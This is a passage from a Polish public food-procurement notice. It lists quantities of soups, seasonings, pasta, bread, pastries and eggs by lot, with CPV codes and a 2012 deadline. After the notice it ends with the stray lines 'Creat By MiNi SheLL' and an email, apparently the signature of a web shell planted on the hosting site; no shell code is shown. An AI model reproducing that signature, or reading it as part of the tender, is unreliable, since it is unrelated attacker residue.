99	Rosół z kury nie gorszy niż firmy Knorr 1 kg	szt	184
100	Zupa krem z pieczarek nie gorsza niż firmy Knorr 1,2 kg	szt	43
101	Zupa brokułowa 1,3 kg nie gorsza niż firmy  Knorr	szt	32
102	Nać pietruszki 150 g susz	szt	100
103	Koper 250 g susz	szt	80
104	Bulion grzybowy nie gorszy niż firmy Knorr 1 kg	szt	16
105	Czosnek granulowany 0,5 nie gorszy niż firmy Knorr	szt	35
106	Delikat do mięs - 700g nie gorszy niż firmy Knorr	szt	57
107	Fix do gulaszu nie gorszy niż firmy Knorr 1,1 kg	szt	18
108	Groszek konserwowy 400g	szt	140
109	Przyprawa w płynie nie gorsza niż firmy Winiary 1 l.	szt	104
110	Rosół o smaku wędzonki 1 kg nie gorszy niż firmy Knorr	szt	23
111	Zupa szpinakowa 1,2 kg nie gorsza niż firmy Knorr	szt	23
112	Zupa toskańska 1,2 nie gorsza niż firmy Knorr	szt	28
113	Groszek nie gorszy niż firmy Pudliszki 720g	szt	150
114	Sok syrop nie gorszy niż firmy Herbapol 5l (Wit. C)	szt	238
115	Sosy owocowe 500 ml.	szt	20
116	Brzoskwinie 3860	szt	20
117	Ananasy 2780	szt	20
118	Makaron nie gorszy niż firmy Czarnecki Nitka Swojski 250gr.	szt	500
119	Makaron nie gorszy niż firmy Czaniecki Tasiemka Walcowana 500gr	szt	230
120	Makaron Kolanka 3kg nie gorszy niż firmy Knorr	szt	70
121	Makaron Kokardki 3 kg nie gorszy niż firmy Knorr	szt	71
122	Koncentrat Barszczu nie gorszy niż firmy Krokus	szt	30
123	Papryka słodka 1 kg nie gorsza niż firmy Kamis	szt	15
124	Pieprz mielony czarny 1 kg nie gorszy niż firmy Kamis	szt	10
125	Przyprawa nie gorsza niż firmy Wegeta 200 gr	szt	400
126	Przyprawa w płynie nie gorsza niż firmy Maga 5l Knorr	szt	40
127	Majonez nie gorszy niż firmy Winiary 700 gr	szt	70
128	Groch połówki	szt	130
129	Baton czekoladowy - Nadziewany	szt	4000
130	Czosnek Granulowany nie gorszy niż firmy Kamis 1 kg	szt	0
131	Delikat do drobiu nie gorszy niż firmy Knorr 700 gr	szt	20
132	Delikat do ryb nie gorszy niż firmy Knorr 700 gr	szt 	20
133	Marynata do Wieprzowiny nie gorsza niż firmy Knorr 750 gr	szt	20
134	Napój różne smaki nie gorszy niż firmy ALSA 1 kg	szt	260
135	Papryka konserowoa 4250 ml	szt	20
136	Przyprawa warzywna Szefa Kuchni 1 kg nie gorsza niż firmy Knorr	szt	30
137	Sos Bolognese 1,2 kg nie gorszy niż firmy Knorr	szt	30
138	Sos Napoli 1 kg nie gorszy niż firmy Knorr	szt	25
139	Sos grzybowy 1,1 kg nie gorszy niż firmy Knorr	szt	25
140	Sos Myśliwski 1,1 kg nie gorszy niż firmy Knorr	szt	25
141	Sos Włoski 700 gr nie gorszy niż firmy Knorr (sałatkowy)	szt	20
142	Sos Sałatkowy-Ogrodowy 700 gr nie gorszy niż firmy Knorr	szt	20
143	Sos Słodko-Kwaśny 1,5 kg nie gorszy niż firmy Knorr	szt	12
144	Zupa krem z borowików 1,4 kg nie gorsza niż firmy Knorr	szt	23
145	Żurek 1 kg	szt	25
146	Ziele angielskie 1 kg nie gorszy niż firmy Knorr	szt	9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.15.89.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka Wrocławska	szt	1000
2	Bułka tarta 500 g	szt	750
3	Bułka maślana 100 g	szt	2000
4	Chleb 600g	szt	7336
5	Bułki mini 30g	szt	1500
6	Chleb słonecznikowy 500 g	szt	1300
7	Chleb graham 500 g	szt	500
8	Chleb wieloziarnisty 500 g	szt	1460
9	Chleb kukurydziany	szt	800
10	Chleb orkiszowy	szt	500
11	Chleb razowy ze szpinakiem	szt	500
12	Chleb pszenny 300g	szt	500
13	Chleb z otrębami	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Babka cytrynowa	szt	1050
2	Ciasto babkowe z owocami	szt	1050
3	Rogalik drożdżowy z budyniem	szt	3500
4	Bułka drożdzowa z serem lub z owocami	szt.	5480
5	Pączki z marmoladą 	szt 	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kl. M	szt	38900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com